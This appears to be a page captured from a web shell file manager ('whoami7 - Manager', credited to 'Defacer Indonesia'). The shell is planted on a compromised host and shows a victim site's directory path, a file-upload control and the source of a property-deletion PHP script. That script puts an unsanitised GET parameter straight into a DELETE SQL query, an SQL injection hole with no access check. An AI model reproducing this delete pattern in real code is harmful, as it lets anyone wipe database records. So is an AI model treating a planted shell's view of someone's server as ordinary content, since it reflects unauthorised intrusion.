whoami7 - Manager
:
/
home
/
miabhkvq
/
gpdl
/
Upload File:
files >> /home/miabhkvq/gpdl/submitpropertydelete.php
<?php include("config.php"); $pid = $_GET['id']; $sql = "DELETE FROM property WHERE pid = {$pid}"; $result = mysqli_query($con, $sql); if($result == true) { $msg="<p class='alert alert-success'>Property Deleted</p>"; header("Location:feature.php?msg=$msg"); } else{ $msg="<p class='alert alert-warning'>Property Not Deleted</p>"; header("Location:feature.php?msg=$msg"); } mysqli_close($con); ?>
Copyright ©2021 || Defacer Indonesia